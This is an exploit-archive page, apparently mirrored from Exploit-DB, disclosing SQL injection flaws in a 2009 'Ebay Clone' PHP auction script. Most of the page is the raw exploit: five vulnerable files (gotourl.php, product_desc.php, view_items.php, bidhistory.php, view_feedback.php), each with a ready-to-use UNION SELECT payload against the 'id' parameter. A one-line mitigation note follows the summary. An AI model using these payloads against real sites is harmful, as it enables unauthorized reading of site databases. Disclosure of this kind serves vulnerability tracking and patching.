header-logo
Suggest Exploit
vendor:
Ebay Clone
by:
Hamza 'MizoZ' N.
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ebay Clone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ebay Clone from (clone2009.com)

The Ebay Clone from clone2009.com is vulnerable to multiple SQL Injection vulnerabilities. The vulnerable files are gotourl.php, product_desc.php, view_items.php, bidhistory.php and view_feedback.php. An attacker can exploit these vulnerabilities by sending malicious SQL queries to the vulnerable parameters. For example, sending the following query to the vulnerable parameter 'id' in the file gotourl.php will redirect the user to the version of the website: [HOST]/[PATH]/gotourl.php?id=-1+union+select+version()--

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

/*

Name : Ebay Clone from (clone2009.com<http://clone2009.com>)
Site : http://www.clone2009.com/

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com

Greetz : Zuka , GreyMen :)

*/

# 1st SQL injection :

File : gotourl.php , Get : id

[HOST]/[PATH]/gotourl.php?id=-1+union+select+version()--

=> You will be redirected to [HOST]/[PATH]/[VERSION]

Demo : http://server/gotourl.php?id=0+union+select+version()--

# 2nd SQL Injection :

File : product_desc.php  , Get : id

[HOST]/[PATH]/product_desc.php?id=[INJECTION]

Demo : http://server/product_desc.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

# 3th SQL Injection :

File : view_items.php , Get : id

[HOST]/[PATH]/view_items.php?id=[INJECTION]

Demo : http://server/view_items.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c666f6e7420636f6c6f723d22726564223e4845524520494e4a454354494f4e3c2f666f6e743e,12,13,14,15,16,17,18--

# 4th SQL Injection :

File : bidhistory.php , Get : id

[HOST]/[PATH]/bidhistory.php?id=[INJECTION]

Demo : http://server/bidhistory.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

# 5th SQL Injection :

FIle : view_feedback.php , Get : id

[HOST]/[PATH]/view_feedback.php?id=[INJECTION]

Demo : http://server/view_feedback.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c68313e484552453c2f68313e,12,13,14,15,16,17,18--

Navigation

Suggest Exploit

Services By CQR